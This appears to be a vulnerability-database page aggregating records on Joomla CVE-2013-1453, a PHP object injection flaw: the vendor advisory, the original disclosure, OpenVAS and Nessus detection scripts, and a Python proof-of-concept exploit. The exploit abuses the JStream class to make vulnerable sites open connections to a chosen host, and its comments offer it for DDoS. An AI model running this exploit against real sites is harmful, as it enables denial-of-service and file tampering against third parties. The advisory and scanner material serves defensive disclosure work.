Search...

[20130201] - Core - Information Disclosure

2013-02-04T00:00:00

ID JOOMLA-548
Type joomla
Reporter Open Source Matters, Inc.
Modified 2013-02-04T00:00:00

Description

Method of encoding search terms led to possible information disclosure.

JSON Vulners Source

Initial Source

{"edition": 4, "references": [], "modified": "2013-02-04T00:00:00", "cvelist": ["CVE-2013-1453"], "bulletinFamily": "software", "href": "https://developer.joomla.org/security-centre/548-20130201-core-information-disclosure.html?highlight=WyJleHBsb2l0Il0=", "description": "Method of encoding search terms led to possible information disclosure.\n", "id": "JOOMLA-548", "reporter": "Open Source Matters, Inc.", "lastseen": "2020-12-24T13:21:37", "published": "2013-02-04T00:00:00", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1453"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103673"]}, {"type": "exploitdb", "idList": ["EDB-ID:24551"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29133"]}, {"type": "zdt", "idList": ["1337DAY-ID-20434"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120561"]}, {"type": "seebug", "idList": ["SSV:78253"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:550AD19DA74828F7399FCFE454945C00"]}, {"type": "nessus", "idList": ["JOOMLA_259.NASL"]}], "modified": "2020-12-24T13:21:37", "rev": 2}, "score": {"value": 4.8, "vector": "NONE", "modified": "2020-12-24T13:21:37", "rev": 2}, "vulnersScore": 4.8}, "type": "joomla", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "title": "[20130201] - Core - Information Disclosure", "affectedSoftware": [{"name": "joomla! cms", "operator": "lt", "version": "3.0.3"}, {"name": "joomla! cms", "operator": "lt", "version": "2.5.9"}], "viewCount": 62, "scheme": null}

{"cve": [{"lastseen": "2020-10-03T12:45:57", "description": "plugins/system/highlight/highlight.php in Joomla! 3.0.x through 3.0.2 and 2.5.x through 2.5.8 allows attackers to unserialize arbitrary PHP objects to obtain sensitive information, delete arbitrary directories, conduct SQL injection attacks, and possibly have other impacts via the highlight parameter. Note: it was originally reported that this issue only allowed attackers to obtain sensitive information, but later analysis demonstrated that other attacks exist.", "edition": 3, "cvss3": {}, "published": "2013-02-13T01:55:00", "title": "CVE-2013-1453", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1453"], "modified": "2017-08-29T01:33:00", "cpe": ["cpe:/a:joomla:joomla\\!:2.5.1", "cpe:/a:joomla:joomla\\!:3.0.0", "cpe:/a:joomla:joomla\\!:2.5.4", "cpe:/a:joomla:joomla\\!:2.5.3", "cpe:/a:joomla:joomla\\!:2.5.2", "cpe:/a:joomla:joomla\\!:2.5.6", "cpe:/a:joomla:joomla\\!:2.5.8", "cpe:/a:joomla:joomla\\!:2.5.0", "cpe:/a:joomla:joomla\\!:3.0.2", "cpe:/a:joomla:joomla\\!:2.5.7", "cpe:/a:joomla:joomla\\!:2.5.5", "cpe:/a:joomla:joomla\\!:3.0.1"], "id": "CVE-2013-1453", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1453", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomla:joomla\\!:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.8:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T17:27:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1453"], "description": "Joomla! is prone to a remote PHP object-injection vulnerability because it\n fails to properly validate user-supplied input.", "modified": "2020-05-08T00:00:00", "published": "2013-03-03T00:00:00", "id": "OPENVAS:1361412562310103673", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103673", "type": "openvas", "title": "Joomla! 'highlight' Parameter PHP Object Injection Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Joomla! 'highlight' Parameter PHP Object Injection Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:joomla:joomla\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103673\");\n script_bugtraq_id(57746);\n script_cve_id(\"CVE-2013-1453\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_name(\"Joomla! 'highlight' Parameter PHP Object Injection Vulnerability\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-03 10:29:04 +0100 (Sun, 03 Mar 2013)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"joomla/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/57746\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n\n script_tag(name:\"summary\", value:\"Joomla! is prone to a remote PHP object-injection vulnerability because it\n fails to properly validate user-supplied input.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to inject arbitrary object in to the application.\n This may aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"Joomla! 2.0.0 through versions prior to 2.5.9\n\n Joomla! 3.0.0 through versions prior to 3.0.3\");\n\n script_tag(name:\"qod\", value:\"50\"); # prone to false positives\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!dir = get_app_location(cpe:CPE, port:port))\n exit(0);\n\nif(dir == \"/\")\n dir = \"\";\n\nurl = dir + '/index.php?highlight=YToxOntpOjA7Tzo3OiJPcGVuVkFTIjowOnt9fQ==';\n\nreq = http_get(item:url, port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(buf =~ \"HTTP/1.. 500\" || \"Catchable fatal error: Object of class __PHP_Incomplete_Class could not be converted to string\" >< buf) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T23:31:25", "description": "Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability. CVE-2013-1453. Webapps exploit for php platform", "published": "2013-02-27T00:00:00", "type": "exploitdb", "title": "Joomla! <= 3.0.2 highlight.php PHP Object Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1453"], "modified": "2013-02-27T00:00:00", "id": "EDB-ID:24551", "href": "https://www.exploit-db.com/exploits/24551/", "sourceData": "-------------------------------------------------------------------\r\nJoomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability\r\n-------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.joomla.org/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 3.0.2 and earlier 3.0.x versions.\r\nVersion 2.5.8 and earlier 2.5.x versions.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in /plugins/system/highlight/highlight.php:\r\n\r\n56.\t// Get the terms to highlight from the request.\r\n57.\t$terms = $input->request->get('highlight', null, 'base64');\r\n58.\t$terms = $terms ? unserialize(base64_decode($terms)) : null;\r\n\r\nUser input passed through the \"highlight\" parameter is not properly sanitized before being used in\r\nan unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the\r\napplication scope. Successful exploitation of this vulnerability doesn't require authentication,\r\nbut requires the \"System Highlight\" plugin to be enabled (such as by default configuration).\r\n\r\n\r\n[-] Solution:\r\n\r\nUpgrade to version 3.0.3 or 2.5.9.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[31/10/2012] - Vendor notified\r\n[08/11/2012] - Vendor asked for a proof of concept\r\n[08/11/2012] - Proof of concept provided to the vendor\r\n[04/02/2013] - Vendor update released\r\n[27/02/2013] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2013-1453 to this vulnerability.\r\n\r\n\r\n[-] Credits:\r\n\r\nVulnerability discovered by Egidio Romano.\r\n\r\n\r\n[-] Original Advisory:\r\n\r\nhttp://karmainsecurity.com/KIS-2013-03\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24551/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1453"], "description": "\r\n-------------------------------------------------------------------\r\nJoomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability\r\n-------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.joomla.org/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 3.0.2 and earlier 3.0.x versions.\r\nVersion 2.5.8 and earlier 2.5.x versions.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in /plugins/system/highlight/highlight.php:\r\n\r\n56. // Get the terms to highlight from the request.\r\n57. $terms = $input->request->get('highlight', null, 'base64');\r\n58. $terms = $terms ? unserialize(base64_decode($terms)) : null;\r\n\r\nUser input passed through the "highlight" parameter is not properly sanitized before being used in\r\nan unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the\r\napplication scope. Successful exploitation of this vulnerability doesn't require authentication,\r\nbut requires the "System Highlight" plugin to be enabled (such as by default configuration).\r\n\r\n\r\n[-] Solution:\r\n\r\nUpgrade to version 3.0.3 or 2.5.9.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[31/10/2012] - Vendor notified\r\n[08/11/2012] - Vendor asked for a proof of concept\r\n[08/11/2012] - Proof of concept provided to the vendor\r\n[04/02/2013] - Vendor update released\r\n[27/02/2013] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2013-1453 to this vulnerability.\r\n\r\n\r\n[-] Credits:\r\n\r\nVulnerability discovered by Egidio Romano.\r\n\r\n\r\n[-] Original Advisory:\r\n\r\nhttp://karmainsecurity.com/KIS-2013-03\r\n", "edition": 1, "modified": "2013-03-03T00:00:00", "published": "2013-03-03T00:00:00", "id": "SECURITYVULNS:DOC:29133", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29133", "title": "[KIS-2013-03] Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-01-09T23:05:47", "edition": 2, "description": "Joomla core plugin 'highlight' unserializes not trusted input. Plugin\ris enabled by default in standard joomla installation.\r This proof of concept exploit uses JStream joomla class to make target\ropens remote tcp connections to custom address, therefore multiple\rvulnerable joomla instances can be used for ddos attacks. (JStream\rclass can also be used to execute chmod on any file with any mode)", "published": "2013-02-25T00:00:00", "type": "zdt", "title": "Joomla <=2.5.8,<=3.0.2 remote tcp connections opener", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1453"], "modified": "2013-02-25T00:00:00", "id": "1337DAY-ID-20434", "href": "https://0day.today/exploit/description/20434", "sourceData": "#!/usr/bin/python\r\n#\r\n# Joomla <=2.5.8, <=3.0.2 remote tcp connections opener\r\n#\r\n# Vendor homepage: www.joomla.org ,'\r\n# Versions affected: <=2.5.8, <=3.0.2 ,' \r\n# Created: 2012-12-08 .,. ,'\r\n# Public disclosure: 2013-02-04 .`.`.`. ,' ,'\r\n# CVE: CVE-2013-1453 .`.`.`.`. ,' ,'\r\n# .`.`.`.`.\r\n# Joomla core plugin 'highlight' unserializes .`.`.`.`. ,' ,'\r\n# not trusted input. Plugin is enabled by \\\\`.`.`. ,'\r\n# default in standard joomla installation. /\\.,. ,' ,'\r\n# /\r\n# This proof of concept exploit uses JStream :\r\n# joomla class to make target opens remote tcp :\r\n# connections to custom address, therefore /\r\n# multiple vulnerable joomla instances can be \"\r\n# used for ddos attacks.\r\n#\r\n# (JStream class can also be used to execute chmod on any file with any mode)\r\n#\r\n# Author: Marcin \"redeemer\" Probola\r\n#\r\nimport threading\r\nimport datetime\r\nimport base64\r\nimport httplib\r\nfrom optparse import OptionParser\r\n\r\nparser = OptionParser()\r\nparser.add_option(\"-H\",\"--host\",dest=\"host\", help=\"Host with vulnerable joomla instance\", default=\"localhost\")\r\nparser.add_option(\"-C\",\"--connect\",dest=\"connectHost\", help=\"Make connection to (in format HOST:PORT)\", default=\"localhost:80\")\r\nparser.add_option(\"-T\",\"--threads\",dest=\"threads\", help=\"number of threads\", default=1)\r\n(options, args) = parser.parse_args()\r\n\r\n# vars\r\nhost = options.host\r\nconnectHost = options.connectHost\r\nthreads = int(options.threads)\r\n\r\n# prepare serialized content\r\nserializedTemplate = 'O:7:\"JStream\":14:{s:11:\"\\0*\\0filemode\";i:438;s:10:\"\\0*\\0dirmode\";i:493;s:12:\"\\0*\\0chunksize\";i:8192;s:11:\"\\0*\\0filename\";s:%d:\"%s\";s:14:\"\\0*\\0writeprefix\";s:0:\"\";s:13:\"\\0*\\0readprefix\";s:0:\"\";s:19:\"\\0*\\0processingmethod\";s:1:\"f\";s:10:\"\\0*\\0filters\";a:0:{}s:6:\"\\0*\\0_fh\";s:1:\"1\";s:12:\"\\0*\\0_filesize\";N;s:11:\"\\0*\\0_context\";N;s:18:\"\\0*\\0_contextOptions\";a:0:{}s:12:\"\\0*\\0_openmode\";s:1:\"w\";s:10:\"\\0*\\0_errors\";a:0:{}}'\r\nftpConnectUrl = \"ftp://u:[email\u00a0protected]\" + connectHost + \"/s\"\r\nserializedBase64 = base64.b64encode( serializedTemplate % ( ftpConnectUrl.__len__(), ftpConnectUrl) )\r\n\r\n# thread class - blow (make http request)\r\nclass ThreadClass(threading.Thread):\r\n\tdef run(self):\r\n\t\tconn = httplib.HTTPConnection(host)\r\n\t\tconn.connect()\r\n\t\tconn.request(\"GET\", \"/?highlight=\"+serializedBase64)\r\n\r\nprint host + \" connect(\" +str(threads)+\") to \" + connectHost + \"\\n\"\r\n\r\n# run threads\r\nfor i in range(threads):\r\n\tt = ThreadClass()\r\n\tt.start()\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20434"}], "packetstorm": [{"lastseen": "2016-12-05T22:11:35", "description": "", "published": "2013-02-27T00:00:00", "type": "packetstorm", "title": "Joomla! 3.0.2 PHP Object Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1453"], "modified": "2013-02-27T00:00:00", "id": "PACKETSTORM:120561", "href": "https://packetstormsecurity.com/files/120561/Joomla-3.0.2-PHP-Object-Injection.html", "sourceData": "`------------------------------------------------------------------- \nJoomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability \n------------------------------------------------------------------- \n \n \n[-] Software Link: \n \nhttp://www.joomla.org/ \n \n \n[-] Affected Versions: \n \nVersion 3.0.2 and earlier 3.0.x versions. \nVersion 2.5.8 and earlier 2.5.x versions. \n \n \n[-] Vulnerability Description: \n \nThe vulnerable code is located in /plugins/system/highlight/highlight.php: \n \n56. // Get the terms to highlight from the request. \n57. $terms = $input->request->get('highlight', null, 'base64'); \n58. $terms = $terms ? unserialize(base64_decode($terms)) : null; \n \nUser input passed through the \"highlight\" parameter is not properly sanitized before being used in \nan unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the \napplication scope. Successful exploitation of this vulnerability doesn't require authentication, \nbut requires the \"System Highlight\" plugin to be enabled (such as by default configuration). \n \n \n[-] Solution: \n \nUpgrade to version 3.0.3 or 2.5.9. \n \n \n[-] Disclosure Timeline: \n \n[31/10/2012] - Vendor notified \n[08/11/2012] - Vendor asked for a proof of concept \n[08/11/2012] - Proof of concept provided to the vendor \n[04/02/2013] - Vendor update released \n[27/02/2013] - Public disclosure \n \n \n[-] CVE Reference: \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) \nhas assigned the name CVE-2013-1453 to this vulnerability. \n \n \n[-] Credits: \n \nVulnerability discovered by Egidio Romano. \n \n \n[-] Original Advisory: \n \nhttp://karmainsecurity.com/KIS-2013-03 \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/120561/joomla302-inject.txt"}], "seebug": [{"lastseen": "2017-11-19T16:10:32", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1453"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78253", "id": "SSV:78253", "sourceData": "\n -------------------------------------------------------------------\r\nJoomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability\r\n-------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.joomla.org/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 3.0.2 and earlier 3.0.x versions.\r\nVersion 2.5.8 and earlier 2.5.x versions.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in /plugins/system/highlight/highlight.php:\r\n\r\n56.\t// Get the terms to highlight from the request.\r\n57.\t$terms = $input->request->get('highlight', null, 'base64');\r\n58.\t$terms = $terms ? unserialize(base64_decode($terms)) : null;\r\n\r\nUser input passed through the "highlight" parameter is not properly sanitized before being used in\r\nan unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the\r\napplication scope. Successful exploitation of this vulnerability doesn't require authentication,\r\nbut requires the "System Highlight" plugin to be enabled (such as by default configuration).\r\n\r\n\r\n[-] Solution:\r\n\r\nUpgrade to version 3.0.3 or 2.5.9.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[31/10/2012] - Vendor notified\r\n[08/11/2012] - Vendor asked for a proof of concept\r\n[08/11/2012] - Proof of concept provided to the vendor\r\n[04/02/2013] - Vendor update released\r\n[27/02/2013] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2013-1453 to this vulnerability.\r\n\r\n\r\n[-] Credits:\r\n\r\nVulnerability discovered by Egidio Romano.\r\n\r\n\r\n[-] Original Advisory:\r\n\r\nhttp://karmainsecurity.com/KIS-2013-03\r\n\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-78253"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:22", "description": "\nJoomla! 3.0.2 - highlight.php PHP Object Injection", "edition": 1, "published": "2013-02-27T00:00:00", "title": "Joomla! 3.0.2 - highlight.php PHP Object Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1453"], "modified": "2013-02-27T00:00:00", "id": "EXPLOITPACK:550AD19DA74828F7399FCFE454945C00", "href": "", "sourceData": "-------------------------------------------------------------------\nJoomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability\n-------------------------------------------------------------------\n\n\n[-] Software Link:\n\nhttp://www.joomla.org/\n\n\n[-] Affected Versions:\n\nVersion 3.0.2 and earlier 3.0.x versions.\nVersion 2.5.8 and earlier 2.5.x versions.\n\n\n[-] Vulnerability Description:\n\nThe vulnerable code is located in /plugins/system/highlight/highlight.php:\n\n56.\t// Get the terms to highlight from the request.\n57.\t$terms = $input->request->get('highlight', null, 'base64');\n58.\t$terms = $terms ? unserialize(base64_decode($terms)) : null;\n\nUser input passed through the \"highlight\" parameter is not properly sanitized before being used in\nan unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the\napplication scope. Successful exploitation of this vulnerability doesn't require authentication,\nbut requires the \"System Highlight\" plugin to be enabled (such as by default configuration).\n\n\n[-] Solution:\n\nUpgrade to version 3.0.3 or 2.5.9.\n\n\n[-] Disclosure Timeline:\n\n[31/10/2012] - Vendor notified\n[08/11/2012] - Vendor asked for a proof of concept\n[08/11/2012] - Proof of concept provided to the vendor\n[04/02/2013] - Vendor update released\n[27/02/2013] - Public disclosure\n\n\n[-] CVE Reference:\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\nhas assigned the name CVE-2013-1453 to this vulnerability.\n\n\n[-] Credits:\n\nVulnerability discovered by Egidio Romano.\n\n\n[-] Original Advisory:\n\nhttp://karmainsecurity.com/KIS-2013-03", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-20T11:36:20", "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is 2.5.x prior to 2.5.9\nor 3.0.x prior to 3.0.3. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A flaw exists in the highlight.php script, within the\n PlgSystemHighlight::onAfterDispatch() function, due to\n improper sanitization of input passed via the\n 'highlight' parameter before it is used in an\n unserialize() call. An authenticated, remote attacker\n can exploit this issue to unserialize arbitrary PHP\n objects, resulting in disclosure of sensitive\n information, deletion of arbitrary directories, SQL\n injection, or other impacts. (CVE-2013-1453)\n\n - An unspecified coding error exists that allows an\n unauthenticated, remote attacker to disclose sensitive\n information. (CVE-2013-1454)\n\n - An unspecified flaw exists when handling undefined\n variables that allows an unauthenticated, remote\n attacker to disclose sensitive information.\n (CVE-2013-1455)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2013-02-14T00:00:00", "title": "Joomla! 2.5.x < 2.5.9 / 3.0.x < 3.0.3 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1454", "CVE-2013-1455", "CVE-2013-1453"], "modified": "2013-02-14T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "JOOMLA_259.NASL", "href": "https://www.tenable.com/plugins/nessus/64634", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64634);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2013-1453\",\n \"CVE-2013-1454\",\n \"CVE-2013-1455\"\n );\n script_bugtraq_id(\n 57746,\n 57751,\n 57752\n );\n script_xref(name:\"EDB-ID\", value:\"24551\");\n\n script_name(english:\"Joomla! 2.5.x < 2.5.9 / 3.0.x < 3.0.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is 2.5.x prior to 2.5.9\nor 3.0.x prior to 3.0.3. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A flaw exists in the highlight.php script, within the\n PlgSystemHighlight::onAfterDispatch() function, due to\n improper sanitization of input passed via the\n 'highlight' parameter before it is used in an\n unserialize() call. An authenticated, remote attacker\n can exploit this issue to unserialize arbitrary PHP\n objects, resulting in disclosure of sensitive\n information, deletion of arbitrary directories, SQL\n injection, or other impacts. (CVE-2013-1453)\n\n - An unspecified coding error exists that allows an\n unauthenticated, remote attacker to disclose sensitive\n information. (CVE-2013-1454)\n\n - An unspecified flaw exists when handling undefined\n variables that allows an unauthenticated, remote\n attacker to disclose sensitive information.\n (CVE-2013-1455)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5477-joomla-2-5-9-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a7433d5d\");\n # https://www.joomla.org/announcements/release-news/5478-joomla-3-0-3-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?58ded3b2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 2.5.9 / 3.0.3 or later. Alternatively,\napply the patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\n\nfix = \"2.5.9 / 3.0.3\";\n\n# Check granularity\nif (version =~ \"^2(\\.5)?$\" || version =~ \"^3(\\.0)?$\")\n audit(AUDIT_VER_NOT_GRANULAR, \"app\", port, version);\n\n# Versions 2.5.x < 2.5.9 and 3.0.x < 3.0.3 are vulnerable\nif (\n version =~ \"^2\\.5\\.[0-8]([^0-9]|$)\" ||\n version =~ \"^3\\.0\\.[0-2]([^0-9]|$)\"\n)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = 